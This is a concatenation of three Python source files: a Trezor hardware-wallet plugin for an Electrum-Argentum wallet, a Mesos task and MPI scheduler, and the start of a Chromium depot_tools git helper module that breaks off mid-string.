plugin.py
import base64
import re
import threading
from binascii import hexlify, unhexlify
from functools import partial
from electrum_arg.bitcoin import (bc_address_to_hash_160, xpub_from_pubkey,
public_key_to_p2pkh, EncodeBase58Check,
TYPE_ADDRESS, TYPE_SCRIPT,
TESTNET, ADDRTYPE_P2PKH, ADDRTYPE_P2SH)
from electrum_arg.i18n import _
from electrum_arg.plugins import BasePlugin, hook
from electrum_arg.transaction import deserialize, Transaction
from electrum_arg.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey
from ..hw_wallet import HW_PluginBase
# TREZOR initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
class TrezorCompatibleKeyStore(Hardware_KeyStore):
def get_derivation(self):
return self.derivation
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise RuntimeError(_('Electrum and %s encryption and decryption are currently incompatible') % self.device)
client = self.get_client()
address_path = self.get_derivation() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
payload = base64.b64decode(message)
nonce, message, msg_hmac = payload[:33], payload[33:-8], payload[-8:]
result = client.decrypt_message(address_n, nonce, message, msg_hmac)
return result.message
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.get_coin_name(), address_n, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
# path of the xpubs that are involved
xpub_path = {}
for txin in tx.inputs():
tx_hash = txin['prevout_hash']
prev_tx[tx_hash] = txin['prev_tx']
for x_pubkey in txin['x_pubkeys']:
if not is_xpubkey(x_pubkey):
continue
xpub, s = parse_xpubkey(x_pubkey)
if xpub == self.get_master_public_key():
xpub_path[xpub] = self.get_derivation()
self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
class TrezorCompatiblePlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, ckd_public, types, HidTransport
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
self.main_thread = threading.current_thread()
# FIXME: move to base class when Ledger is fixed
if self.libraries_available:
self.device_manager().register_devices(self.DEVICE_IDS)
def _try_hid(self, device):
self.print_error("Trying to connect over USB...")
if device.interface_number == 1:
pair = [None, device.path]
else:
pair = [device.path, None]
try:
return self.hid_transport(pair)
except BaseException as e:
self.print_error("cannot connect at", device.path, str(e))
return None
def _try_bridge(self, device):
self.print_error("Trying to connect over Trezor Bridge...")
try:
return self.bridge_transport({'path': hexlify(device.path)})
except BaseException as e:
self.print_error("cannot connect to bridge", str(e))
return None
def create_client(self, device, handler):
# disable the bridge because it seems to never return when a KeepKey is plugged in
#transport = self._try_bridge(device) or self._try_hid(device)
transport = self._try_hid(device)
if not transport:
self.print_error("cannot connect to device")
return
self.print_error("connected to device at", device.path)
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.print_error("ping failed", str(e))
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated %s firmware for device labelled %s. Please '
'download the updated firmware from %s') %
(self.device, client.label(), self.firmware_URL))
self.print_error(msg)
handler.show_error(msg)
return None
return client
def get_client(self, keystore, force_pair=True):
# Client interaction must not happen in the main GUI thread
assert self.main_thread != threading.current_thread()
devmgr = self.device_manager()
handler = keystore.handler
with devmgr.hid_lock:
client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
if TESTNET:
return "Testnet"
else:
return "Argentum"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your %s.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your %s, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
) % (self.device, self.device)
choices = [
# Must be short as Qt doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
def f(method):
import threading
settings = self.request_trezor_init_settings(wizard, method, self.device)
t = threading.Thread(target = self._initialize_device, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
wizard.loop.exec_()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection = settings
if method == TIM_RECOVER and self.device == 'TREZOR':
# Warn user about firmware lameness
handler.show_error(_(
"You will be asked to enter 24 words regardless of your "
"seed's actual length. If you enter a word incorrectly or "
"misspell it, you cannot change it or go back - you will need "
"to start again from the beginning.\n\nSo please enter "
"the words carefully!"))
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language)
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
wizard.loop.exit(0)
def setup_device(self, device_info, wizard):
'''Called when creating a new wallet. Select the device to use. If
the device is uninitialized, go through the initialization
process.'''
devmgr = self.device_manager()
device_id = device_info.device.id_
client = devmgr.client_by_id(device_id)
# fixme: we should use: client.handler = wizard
client.handler = self.create_handler(wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
client.get_xpub('m')
client.used()
def get_xpub(self, device_id, derivation, wizard):
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
client.handler = wizard
xpub = client.get_xpub(derivation)
client.used()
return xpub
def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
self.prev_tx = prev_tx
self.xpub_path = xpub_path
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, True)
outputs = self.tx_outputs(keystore.get_derivation(), tx)
signed_tx = client.sign_tx(self.get_coin_name(), inputs, outputs, lock_time=tx.locktime)[1]
raw = signed_tx.encode('hex')
tx.update_signatures(raw)
def show_address(self, wallet, address):
client = self.get_client(wallet.keystore)
if not client.atleast_version(1, 3):
wallet.keystore.handler.show_error(_("Your device firmware is too old"))
return
change, index = wallet.get_address_index(address)
derivation = wallet.keystore.derivation
address_path = "%s/%d/%d"%(derivation, change, index)
address_n = client.expand_path(address_path)
client.get_address(self.get_coin_name(), address_n, True)
def tx_inputs(self, tx, for_sig=False):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin['type'] == 'coinbase':
prev_hash = "\0"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
x_pubkeys = txin['x_pubkeys']
if len(x_pubkeys) == 1:
x_pubkey = x_pubkeys[0]
xpub, s = parse_xpubkey(x_pubkey)
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype.address_n.extend(xpub_n + s)
else:
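# Multisig input: wrap each cosigner key in an HDNodePathType and build the
# MultisigRedeemScriptType (with any existing signatures), then locate the
# xpub that belongs to this keystore to fill in address_n below.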
def f(x_pubkey):
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
else:
xpub = xpub_from_pubkey(0, x_pubkey.decode('hex'))
s = []
node = self.ckd_public.deserialize(xpub)
return self.types.HDNodePathType(node=node, address_n=s)
pubkeys = map(f, x_pubkeys)
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=map(lambda x: x.decode('hex') if x else '', txin.get('signatures')),
m=txin.get('num_sig'),
)
txinputtype = self.types.TxInputType(
script_type=self.types.SPENDMULTISIG,
multisig=multisig
)
# find which key is mine
for x_pubkey in x_pubkeys:
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
if xpub in self.xpub_path:
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype.address_n.extend(xpub_n + s)
break
prev_hash = unhexlify(txin['prevout_hash'])
prev_index = txin['prevout_n']
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if 'scriptSig' in txin:
script_sig = txin['scriptSig'].decode('hex')
txinputtype.script_sig = script_sig
if 'sequence' in txin:
sequence = txin['sequence']
txinputtype.sequence = sequence
inputs.append(txinputtype)
return inputs
def tx_outputs(self, derivation, tx):
outputs = []
has_change = False
for _type, address, amount in tx.outputs():
info = tx.output_info.get(address)
if info is not None and not has_change:
has_change = True # no more than one change address
addrtype, hash_160 = bc_address_to_hash_160(address)
index, xpubs, m = info
if addrtype == ADDRTYPE_P2PKH:
address_n = self.client_class.expand_path(derivation + "/%d/%d"%index)
txoutputtype = self.types.TxOutputType(
amount = amount,
script_type = self.types.PAYTOADDRESS,
address_n = address_n,
)
elif addrtype == ADDRTYPE_P2SH:
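# Change sent to a multisig (P2SH) address: rebuild the redeem script from the
# cosigner xpubs so the device can recognize the output as its own change.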
address_n = self.client_class.expand_path("/%d/%d"%index)
nodes = map(self.ckd_public.deserialize, xpubs)
pubkeys = [ self.types.HDNodePathType(node=node, address_n=address_n) for node in nodes]
multisig = self.types.MultisigRedeemScriptType(
pubkeys = pubkeys,
signatures = [b''] * len(pubkeys),
m = m)
txoutputtype = self.types.TxOutputType(
multisig = multisig,
amount = amount,
script_type = self.types.PAYTOMULTISIG)
else:
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = amount
if _type == TYPE_SCRIPT:
txoutputtype.script_type = self.types.PAYTOOPRETURN
txoutputtype.op_return_data = address[2:]
elif _type == TYPE_ADDRESS:
addrtype, hash_160 = bc_address_to_hash_160(address)
if addrtype == ADDRTYPE_P2PKH:
txoutputtype.script_type = self.types.PAYTOADDRESS
elif addrtype == ADDRTYPE_P2SH:
txoutputtype.script_type = self.types.PAYTOSCRIPTHASH
else:
raise BaseException('addrtype')
txoutputtype.address = address
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx):
t = self.types.TransactionType()
d = deserialize(tx.raw)
t.version = d['version']
t.lock_time = d['lockTime']
inputs = self.tx_inputs(tx)
t.inputs.extend(inputs)
for vout in d['outputs']:
o = t.bin_outputs.add()
o.amount = vout['value']
o.script_pubkey = vout['scriptPubKey'].decode('hex')
return t
# This function is called from the trezor libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electrum_tx_to_txtype(tx)
scheduler.py
#!/usr/bin/env python
import os
import cPickle as pickle
import sys
import time
import socket
import random
from optparse import OptionParser
from threading import Thread
import subprocess
from operator import itemgetter
import logging
import signal
import zmq
import mesos
import mesos_pb2
ctx = zmq.Context()
class Task:
def __init__(self, id):
self.id = id
self.tried = 0
REFUSE_FILTER = mesos_pb2.Filters()
REFUSE_FILTER.refuse_seconds = -1
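# Filter attached to empty/partial launchTasks calls; the negative
# refuse_seconds is presumably intended to decline the rest of the offer
# indefinitely rather than for the default few seconds.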
def parse_mem(m):
try:
return float(m)
except ValueError:
number, unit = float(m[:-1]), m[-1].lower()
if unit == 'g':
number *= 1024
elif unit == 'k':
number /= 1024
return number
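# e.g. parse_mem('100m') -> 100.0, parse_mem('2g') -> 2048.0,
#      parse_mem('512k') -> 0.5 (values are in MB)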
class SubmitScheduler(mesos.Scheduler):
def __init__(self, options, command):
self.framework_name = '[drun@%s] ' % socket.gethostname() + ' '.join(sys.argv[1:])
self.cpus = options.cpus
self.mem = parse_mem(options.mem)
self.options = options
self.command = command
self.total_tasks = list(reversed([Task(i)
for i in range(options.start, options.tasks)]))
self.task_launched = {}
self.slaveTasks = {}
self.started = False
self.stopped = False
self.next_try = 0
def getExecutorInfo(self):
frameworkDir = os.path.abspath(os.path.dirname(sys.argv[0]))
executorPath = os.path.join(frameworkDir, "executor")
execInfo = mesos_pb2.ExecutorInfo()
execInfo.executor_id.value = "default"
execInfo.uri = executorPath
return execInfo
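# Bind a ZMQ PULL socket on a random port and forward everything received on
# it to `output`; the returned endpoint is shipped to the executors
# (std_port/err_port) so task stdout/stderr can be streamed back.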
def create_port(self, output):
sock = ctx.socket(zmq.PULL)
host = socket.gethostname()
port = sock.bind_to_random_port("tcp://0.0.0.0")
def redirect():
while True:
line = sock.recv()
output.write(line)
t = Thread(target=redirect)
t.daemon = True
t.start()
return "tcp://%s:%d" % (host, port)
def registered(self, driver, fid):
logging.debug("Registered with Mesos, FID = %s" % fid.value)
self.fid = fid.value
self.std_port = self.create_port(sys.stdout)
self.err_port = self.create_port(sys.stderr)
def getResource(self, offer):
cpus, mem = 0, 0
for r in offer.resources:
if r.name == 'cpus':
cpus = float(r.scalar.value)
elif r.name == 'mem':
mem = float(r.scalar.value)
return cpus, mem
def getAttributes(self, offer):
attrs = {}
for a in offer.attributes:
attrs[a.name] = a.text.value
return attrs
def resourceOffers(self, driver, offers):
tpn = self.options.task_per_node or sys.maxint
random.shuffle(offers)
for offer in offers:
cpus, mem = self.getResource(offer)
logging.debug("got resource offer %s: cpus:%s, mem:%s at %s",
offer.id.value, cpus, mem, offer.hostname)
attrs = self.getAttributes(offer)
if self.options.group and attrs.get('group', 'None') not in self.options.group:
driver.launchTasks(offer.id, [], REFUSE_FILTER)
continue
sid = offer.slave_id.value
tasks = []
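# Keep carving tasks out of this offer while it still has enough cpu/mem and
# the per-node task limit (tpn) has not been reached.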
while (self.total_tasks and cpus >= self.cpus and mem >= self.mem
and len(self.slaveTasks.get(sid, set())) < tpn):
logging.debug("Accepting slot on slave %s (%s)",
offer.slave_id.value, offer.hostname)
t = self.total_tasks.pop()
task = self.create_task(offer, t)
tasks.append(task)
t.offer_id = offer.id.value
self.task_launched[t.id] = t
self.slaveTasks.setdefault(sid, set()).add(t.id)
cpus -= self.cpus
mem -= self.mem
driver.launchTasks(offer.id, tasks, REFUSE_FILTER)
self.started = True
def create_task(self, offer, t):
task = mesos_pb2.TaskDescription()
task.task_id.value = str(t.id)
task.slave_id.value = offer.slave_id.value
task.name = "task %s/%d" % (t.id, self.options.tasks)
env = dict(os.environ)
env['DRUN_RANK'] = str(t.id)
env['DRUN_SIZE'] = str(self.options.tasks)
if self.options.expand:
for i, x in enumerate(self.command):
self.command[i] = x % {'RANK': t.id, 'SIZE': self.options.tasks}
task.data = pickle.dumps([os.getcwd(), self.command, env, self.options.shell, self.std_port, self.err_port])
cpu = task.resources.add()
cpu.name = "cpus"
cpu.type = 0 # mesos_pb2.Value.SCALAR
cpu.scalar.value = self.cpus
mem = task.resources.add()
mem.name = "mem"
mem.type = 0 # mesos_pb2.Value.SCALAR
mem.scalar.value = self.mem
return task
def statusUpdate(self, driver, update):
logging.debug("Task %s in state %d" % (update.task_id.value, update.state))
if update.state >= mesos_pb2.TASK_FINISHED:
tid = int(update.task_id.value)
if tid not in self.task_launched:
return
t = self.task_launched.pop(tid)
slave = None
for s in self.slaveTasks:
if tid in self.slaveTasks[s]:
slave = s
self.slaveTasks[s].remove(tid)
break
if update.state >= mesos_pb2.TASK_FAILED:
if t.tried < self.options.retry:
t.tried += 1
logging.warning("task %d failed with %d, retry %d", t.id, update.state, t.tried)
if not self.total_tasks:
driver.reviveOffers() # request more offers again
self.total_tasks.append(t) # try again
else:
logging.error("task %d failed with %d on %s", t.id, update.state, slave)
if not self.task_launched and not self.total_tasks:
self.stop(driver) # all done
def offerRescinded(self, driver, offer_id):
logging.error("resource rescinded: %s", offer_id)
for t in self.task_launched.values():
if offer_id.value == t.offer_id:
self.total_tasks.append(t)
del self.task_launched[t.id]
driver.reviveOffers()
def slaveLost(self, driver, slave_id):
logging.warning("slave %s lost", slave_id.value)
#for tid in self.slaveTasks[slave_id.value]:
# self.total_tasks.append(self.task_launched[tid])
# del self.task_launched[tid]
#driver.reviveOffers()
def error(self, driver, code, message):
logging.error("Error from Mesos: %s (error code: %d)" % (message, code))
def stop(self, driver):
driver.stop(False)
driver.join()
self.stopped = True
logging.debug("scheduler stopped")
class MPIScheduler(SubmitScheduler):
def resourceOffers(self, driver, offers):
if not self.total_tasks:
for o in offers:
driver.launchTasks(o.id, [], REFUSE_FILTER)
return
random.shuffle(offers)
used_offers = []
need = self.options.tasks
for offer in offers:
cpus, mem = self.getResource(offer)
attrs = self.getAttributes(offer)
logging.debug("got resource offer %s: cpus:%s, mem:%s at %s",
offer.id.value, cpus, mem, offer.hostname)
if self.options.group and attrs.get('group', 'None') not in self.options.group:
continue
slots = min(cpus/self.cpus, mem/self.mem)
if self.options.task_per_node:
slots = min(slots, self.options.task_per_node)
if slots >= 1 :
used_offers.append((offer, slots))
if sum(s for o,s in used_offers) < need:
logging.warning('not enough offers: need %d, offered %d', need, sum(s for o,s in used_offers))
for o in offers:
driver.launchTasks(o.id, [])
self.next_try = time.time() + 60
return
hosts = []
c = 0
for offer, slots in sorted(used_offers, key=itemgetter(1), reverse=True):
k = min(need - c, slots)
hosts.append((offer, k))
c += k
if c >= need:
break
try:
slaves = self.start_mpi(self.command, self.options.tasks, hosts)
except Exception:
for o in offers:
driver.launchTasks(o.id, [])
self.next_try = time.time() + 10
return
tasks = {}
for i, ((offer, k), slave) in enumerate(zip(hosts,slaves)):
t = Task(i)
self.task_launched[t.id] = t
tasks[offer.id.value] = [self.create_task(offer, t, slave.split(' '), k)]
for o in offers:
driver.launchTasks(o.id, tasks.get(o.id.value, []), REFUSE_FILTER)
self.total_tasks = []
self.started = True
def create_task(self, offer, t, command, k):
task = mesos_pb2.TaskDescription()
task.task_id.value = str(t.id)
task.slave_id.value = offer.slave_id.value
task.name = "task %s" % t.id
env = dict(os.environ)
task.data = pickle.dumps([os.getcwd(), command, env, self.options.shell, self.std_port, self.err_port])
cpu = task.resources.add()
cpu.name = "cpus"
cpu.type = 0 #mesos_pb2.Value.SCALAR
cpu.scalar.value = self.cpus * k
mem = task.resources.add()
mem.name = "mem"
mem.type = 0 #mesos_pb2.Value.SCALAR
mem.scalar.value = self.mem * k
return task
def start_mpi(self, command, tasks, offers):
hosts = ','.join("%s:%d" % (offer.hostname, slots) for offer, slots in offers)
logging.debug("choosed hosts: %s", hosts)
cmd = ['mpirun', '-prepend-rank', '-launcher', 'none', '-hosts', hosts, '-np', str(tasks)] + command
self.p = p = subprocess.Popen(cmd, bufsize=0, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
slaves = []
prefix = 'HYDRA_LAUNCH: '
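# With '-launcher none', mpirun prints one 'HYDRA_LAUNCH: <proxy command>'
# line per host followed by 'HYDRA_LAUNCH_END'; each proxy command is later
# run on the matching slave via create_task.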
while True:
line = p.stdout.readline()
if not line: break
if line.startswith(prefix):
slaves.append(line[len(prefix):-1].strip())
if line == 'HYDRA_LAUNCH_END\n':
break
if len(slaves) != len(offers):
logging.error("offers: %s, slaves: %s", offers, slaves)
raise Exception("slaves not match with offers")
def output(f):
while True:
line = f.readline()
if not line: break
sys.stdout.write(line)
self.tout = t = Thread(target=output, args=[p.stdout])
t.daemon = True
t.start()
self.terr = t = Thread(target=output, args=[p.stderr])
t.daemon = True
t.start()
return slaves
def stop(self, driver):
if self.started:
self.p.wait()
driver.stop(False)
driver.join()
self.stopped = True
logging.debug("scheduler stopped")
if __name__ == "__main__":
parser = OptionParser(usage="Usage: %prog [options] <command>")
parser.allow_interspersed_args=False
parser.add_option("-s", "--master", type="string",
default="zoo://zk1:2181,zk2:2181,zk3:2181,zk4:2181,zk5:2181/mesos_master",
help="url of master (default: zookeeper")
parser.add_option("-i", "--mpi", action="store_true",
help="run MPI tasks")
parser.add_option("-n", "--tasks", type="int", default=1,
help="number task to launch (default: 1)")
parser.add_option("-b", "--start", type="int", default=0,
help="which task to start (default: 0)")
parser.add_option("-p", "--task_per_node", type="int", default=0,
help="max number of tasks on one node (default: 0)")
parser.add_option("-r","--retry", type="int", default=0,
help="retry times when failed (default: 0)")
parser.add_option("-c","--cpus", type="float", default=1,
help="number of CPUs per task (default: 1)")
parser.add_option("-m","--mem", type="string", default='100m',
help="MB of memory per task (default: 100m)")
parser.add_option("-g","--group", type="string", default='',
help="which group to run (default: ''")
parser.add_option("--expand", action="store_true",
help="expand expression in command line")
parser.add_option("--shell", action="store_true",
help="using shell re-intepret the cmd args")
# parser.add_option("--kill", type="string", default="",
# help="kill a job with frameword id")
parser.add_option("-q", "--quiet", action="store_true",
help="be quiet", )
parser.add_option("-v", "--verbose", action="store_true",
help="show more useful log", )
(options, command) = parser.parse_args()
# if options.kill:
# sched = MPIScheduler(options, command)
# fid = mesos_pb2.FrameworkID()
# fid.value = options.kill
# driver = mesos.MesosSchedulerDriver(sched, sched.framework_name,
# sched.getExecutorInfo(), options.master, fid)
# driver.start()
# driver.stop(False)
# os._exit(0)
if not command:
parser.print_help()
exit(2)
logging.basicConfig(format='[drun] %(asctime)-15s %(message)s',
level=options.quiet and logging.WARNING
or options.verbose and logging.DEBUG
or logging.INFO)
if options.mpi:
if options.retry > 0:
logging.error("MPI application can not retry")
options.retry = 0
sched = MPIScheduler(options, command)
else:
sched = SubmitScheduler(options, command)
logging.debug("Connecting to mesos master %s", options.master)
driver = mesos.MesosSchedulerDriver(sched, sched.framework_name,
sched.getExecutorInfo(), options.master)
driver.start()
def handler(signm, frame):
logging.warning("got signal %d, exit now", signm)
sched.stop(driver)
sys.exit(1)
signal.signal(signal.SIGTERM, handler)
signal.signal(signal.SIGINT, handler)
signal.signal(signal.SIGHUP, handler)
signal.signal(signal.SIGABRT, handler)
signal.signal(signal.SIGQUIT, handler)
while not sched.stopped:
time.sleep(1)
if not sched.started and sched.next_try > 0 and time.time() > sched.next_try:
driver.reviveOffers()
git_common.py
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
# Monkeypatch IMapIterator so that Ctrl-C can kill everything properly.
# Derived from https://gist.github.com/aljungberg/626518
import multiprocessing.pool
from multiprocessing.pool import IMapIterator
def wrapper(func):
def wrap(self, timeout=None):
return func(self, timeout=timeout or 1e100)
return wrap
IMapIterator.next = wrapper(IMapIterator.next)
IMapIterator.__next__ = IMapIterator.next
# TODO(iannucci): Monkeypatch all other 'wait' methods too.
import binascii
import collections
import contextlib
import functools
import logging
import os
import re
import setup_color
import shutil
import signal
import sys
import tempfile
import textwrap
import threading
import subprocess2
from StringIO import StringIO
ROOT = os.path.abspath(os.path.dirname(__file__))
IS_WIN = sys.platform == 'win32'
GIT_EXE = ROOT+'\\git.bat' if IS_WIN else 'git'
TEST_MODE = False
FREEZE = 'FREEZE'
FREEZE_SECTIONS = {
'indexed': 'soft',
'unindexed': 'mixed'
}
FREEZE_MATCHER = re.compile(r'%s.(%s)' % (FREEZE, '|'.join(FREEZE_SECTIONS)))
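# freeze() records staged changes as a 'FREEZE.indexed' commit and everything
# else as 'FREEZE.unindexed'; thaw() walks rev-list from HEAD and resets each
# FREEZE commit with the matching mode ('soft' for indexed, 'mixed' for
# unindexed) to restore the working state.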
# Retry a git operation if git returns a error response with any of these
# messages. It's all observed 'bad' GoB responses so far.
#
# This list is inspired/derived from the one in ChromiumOS's Chromite:
# <CHROMITE>/lib/git.py::GIT_TRANSIENT_ERRORS
#
# It was last imported from '7add3ac29564d98ac35ce426bc295e743e7c0c02'.
GIT_TRANSIENT_ERRORS = (
# crbug.com/285832
r'!.*\[remote rejected\].*\(error in hook\)',
# crbug.com/289932
r'!.*\[remote rejected\].*\(failed to lock\)',
# crbug.com/307156
r'!.*\[remote rejected\].*\(error in Gerrit backend\)',
# crbug.com/285832
r'remote error: Internal Server Error',
# crbug.com/294449
r'fatal: Couldn\'t find remote ref ',
# crbug.com/220543
r'git fetch_pack: expected ACK/NAK, got',
# crbug.com/189455
r'protocol error: bad pack header',
# crbug.com/202807
r'The remote end hung up unexpectedly',
# crbug.com/298189
r'TLS packet with unexpected length was received',
# crbug.com/187444
r'RPC failed; result=\d+, HTTP code = \d+',
# crbug.com/388876
r'Connection timed out',
# crbug.com/430343
# TODO(dnj): Resync with Chromite.
r'The requested URL returned error: 5\d+',
)
GIT_TRANSIENT_ERRORS_RE = re.compile('|'.join(GIT_TRANSIENT_ERRORS),
re.IGNORECASE)
# git's for-each-ref command first supported the upstream:track token in its
# format string in version 1.9.0, but some usages were broken until 2.3.0.
# See git commit b6160d95 for more information.
MIN_UPSTREAM_TRACK_GIT_VERSION = (2, 3)
class BadCommitRefException(Exception):
def __init__(self, refs):
msg = ('one of %s does not seem to be a valid commitref.' %
str(refs))
super(BadCommitRefException, self).__init__(msg)
def memoize_one(**kwargs):
"""Memoizes a single-argument pure function.
Values of None are not cached.
Kwargs:
threadsafe (bool) - REQUIRED. Specifies whether to use locking around
cache manipulation functions. This is a kwarg so that users of memoize_one
are forced to explicitly and verbosely pick True or False.
Adds the following methods to the decorated function:
* get(key, default=None) - Gets the value for this key from the cache.
* set(key, value) - Sets the value for this key in the cache.
* clear() - Drops the entire contents of the cache. Useful for unittests.
* update(other) - Updates the contents of the cache from another dict.
"""
assert 'threadsafe' in kwargs, 'Must specify threadsafe={True,False}'
threadsafe = kwargs['threadsafe']
if threadsafe:
def withlock(lock, f):
def inner(*args, **kwargs):
with lock:
return f(*args, **kwargs)
return inner
else:
def withlock(_lock, f):
return f
def decorator(f):
# Instantiate the lock in decorator, in case users of memoize_one do:
#
# memoizer = memoize_one(threadsafe=True)
#
# @memoizer
# def fn1(val): ...
#
# @memoizer
# def fn2(val): ...
lock = threading.Lock() if threadsafe else None
cache = {}
_get = withlock(lock, cache.get)
_set = withlock(lock, cache.__setitem__)
@functools.wraps(f)
def inner(arg):
ret = _get(arg)
if ret is None:
ret = f(arg)
if ret is not None:
_set(arg, ret)
return ret
inner.get = _get
inner.set = _set
inner.clear = withlock(lock, cache.clear)
inner.update = withlock(lock, cache.update)
return inner
return decorator
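# Illustrative usage of memoize_one (the decorated function below is hypothetical):
#
#   @memoize_one(threadsafe=False)
#   def config_cached(option):
#     return get_config(option)
#
#   config_cached('user.email')   # first call runs `git config`
#   config_cached('user.email')   # second call is served from the cache
#   config_cached.clear()         # drop the cache, e.g. in a unittest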
def _ScopedPool_initer(orig, orig_args): # pragma: no cover
"""Initializer method for ScopedPool's subprocesses.
This helps ScopedPool handle Ctrl-C's correctly.
"""
signal.signal(signal.SIGINT, signal.SIG_IGN)
if orig:
orig(*orig_args)
@contextlib.contextmanager
def ScopedPool(*args, **kwargs):
"""Context Manager which returns a multiprocessing.pool instance which
correctly deals with thrown exceptions.
*args - Arguments to multiprocessing.pool
Kwargs:
kind ('threads', 'procs') - The type of underlying coprocess to use.
**etc - Arguments to multiprocessing.pool
"""
if kwargs.pop('kind', None) == 'threads':
pool = multiprocessing.pool.ThreadPool(*args, **kwargs)
else:
orig, orig_args = kwargs.get('initializer'), kwargs.get('initargs', ())
kwargs['initializer'] = _ScopedPool_initer
kwargs['initargs'] = orig, orig_args
pool = multiprocessing.pool.Pool(*args, **kwargs)
try:
yield pool
pool.close()
except:
pool.terminate()
raise
finally:
pool.join()
class ProgressPrinter(object):
"""Threaded single-stat status message printer."""
def __init__(self, fmt, enabled=None, fout=sys.stderr, period=0.5):
"""Create a ProgressPrinter.
Use it as a context manager which produces a simple 'increment' method:
with ProgressPrinter('(%%(count)d/%d)' % 1000) as inc:
for i in xrange(1000):
# do stuff
if i % 10 == 0:
inc(10)
Args:
fmt - String format with a single '%(count)d' where the counter value
should go.
enabled (bool) - If this is None, will default to True if
logging.getLogger() is set to INFO or more verbose.
fout (file-like) - The stream to print status messages to.
period (float) - The time in seconds for the printer thread to wait
between printing.
"""
self.fmt = fmt
if enabled is None: # pragma: no cover
self.enabled = logging.getLogger().isEnabledFor(logging.INFO)
else:
self.enabled = enabled
self._count = 0
self._dead = False
self._dead_cond = threading.Condition()
self._stream = fout
self._thread = threading.Thread(target=self._run)
self._period = period
def _emit(self, s):
if self.enabled:
self._stream.write('\r' + s)
self._stream.flush()
def _run(self):
with self._dead_cond:
while not self._dead:
self._emit(self.fmt % {'count': self._count})
self._dead_cond.wait(self._period)
self._emit((self.fmt + '\n') % {'count': self._count})
def inc(self, amount=1):
self._count += amount
def __enter__(self):
self._thread.start()
return self.inc
def __exit__(self, _exc_type, _exc_value, _traceback):
self._dead = True
with self._dead_cond:
self._dead_cond.notifyAll()
self._thread.join()
del self._thread
def once(function):
"""@Decorates |function| so that it only performs its action once, no matter
how many times the decorated |function| is called."""
def _inner_gen():
yield function()
while True:
yield
return _inner_gen().next
## Git functions
def die(message, *args):
print >> sys.stderr, textwrap.dedent(message % args)
sys.exit(1)
def blame(filename, revision=None, porcelain=False, *_args):
command = ['blame']
if porcelain:
command.append('-p')
if revision is not None:
command.append(revision)
command.extend(['--', filename])
return run(*command)
def branch_config(branch, option, default=None):
return get_config('branch.%s.%s' % (branch, option), default=default)
def branch_config_map(option):
"""Return {branch: <|option| value>} for all branches."""
try:
reg = re.compile(r'^branch\.(.*)\.%s$' % option)
lines = get_config_regexp(reg.pattern)
return {reg.match(k).group(1): v for k, v in (l.split() for l in lines)}
except subprocess2.CalledProcessError:
return {}
def branches(*args):
NO_BRANCH = ('* (no branch', '* (detached', '* (HEAD detached')
key = 'depot-tools.branch-limit'
limit = get_config_int(key, 20)
raw_branches = run('branch', *args).splitlines()
num = len(raw_branches)
if num > limit:
die("""\
Your git repo has too many branches (%d/%d) for this tool to work well.
You may adjust this limit by running:
